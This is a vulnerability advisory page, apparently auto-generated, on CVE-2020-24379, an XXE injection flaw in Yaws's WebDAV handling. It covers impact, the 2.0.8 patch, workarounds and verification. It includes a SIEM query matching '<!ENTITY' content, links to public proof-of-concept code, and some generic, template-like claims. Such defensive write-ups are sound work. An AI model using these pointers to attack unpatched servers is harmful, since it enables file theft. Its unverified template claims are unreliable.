CVE-2020-24379
📋 TL;DR
This vulnerability allows attackers to perform XML External Entity (XXE) injection attacks through the WebDAV implementation in Yaws web server. Attackers can read arbitrary files from the server, potentially leading to sensitive data exposure or server-side request forgery. Organizations running Yaws web server versions 1.81 through 2.0.7 with WebDAV enabled are affected.
💻 Affected Systems
- Yaws web server
📦 What is this software?
Ubuntu Linux by Canonical
Yaws by Yaws
⚠️ Risk & Real-World Impact
Worst Case
Complete server compromise allowing arbitrary file read, potential remote code execution, and full system access.
Likely Case
Sensitive file disclosure including configuration files, credentials, and system files leading to further attacks.
If Mitigated
Limited impact with proper network segmentation, file system permissions, and XML parsing restrictions.
🎯 Exploit Status
Public proof-of-concept code exists and has been weaponized. Exploitation requires WebDAV endpoint access but no authentication.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.0.8 and later
Vendor Advisory: https://github.com/erlyaws/yaws/commits/master
Restart Required: Yes
Instructions:
1. Upgrade Yaws to version 2.0.8 or later. 2. Download from official repository. 3. Stop Yaws service. 4. Install new version. 5. Restart Yaws service.
🔧 Temporary Workarounds
Disable WebDAV module
linuxDisable the WebDAV functionality if not required
Edit yaws.conf and remove or comment out WebDAV configuration
Set <webdav>false</webdav> in server configuration
Restrict XML parsing
allConfigure XML parser to disable external entity processing
Set XML parser configuration to disable DTD and external entities
🧯 If You Can't Patch
- Disable WebDAV module entirely in Yaws configuration
- Implement network-level restrictions to block access to WebDAV endpoints
🔍 How to Verify
Check if Vulnerable:
Check Yaws version and WebDAV configuration. If version is between 1.81-2.0.7 and WebDAV is enabled, system is vulnerable.Check Version:
yaws --version or check running process versionVerify Fix Applied:
Verify Yaws version is 2.0.8 or later and test WebDAV endpoint with XXE payloads.📡 Detection & Monitoring
Log Indicators:
- Unusual XML requests to WebDAV endpoints
- File read attempts via XML entities
- Error logs showing XML parsing failures
Network Indicators:
- HTTP requests with XML content containing external entity references
- Requests to WebDAV endpoints with unusual payloads
SIEM Query:
source="yaws" AND (uri="*webdav*" OR method="PROPFIND") AND content="<!ENTITY"🔗 References
- https://github.com/erlyaws/yaws/commits/master
- https://github.com/vulnbe/poc-yaws-dav-xxe
- https://lists.debian.org/debian-lts-announce/2020/09/msg00022.html
- https://packetstormsecurity.com/files/159106/Yaws-2.0.7-XML-Injection-Command-Injection.html
- https://usn.ubuntu.com/4569-1/
- https://vuln.be/post/yaws-xxe-and-shell-injections/
- https://www.debian.org/security/2020/dsa-4773
- https://github.com/erlyaws/yaws/commits/master
- https://github.com/vulnbe/poc-yaws-dav-xxe
- https://lists.debian.org/debian-lts-announce/2020/09/msg00022.html
- https://packetstormsecurity.com/files/159106/Yaws-2.0.7-XML-Injection-Command-Injection.html
- https://usn.ubuntu.com/4569-1/
- https://vuln.be/post/yaws-xxe-and-shell-injections/
- https://www.debian.org/security/2020/dsa-4773
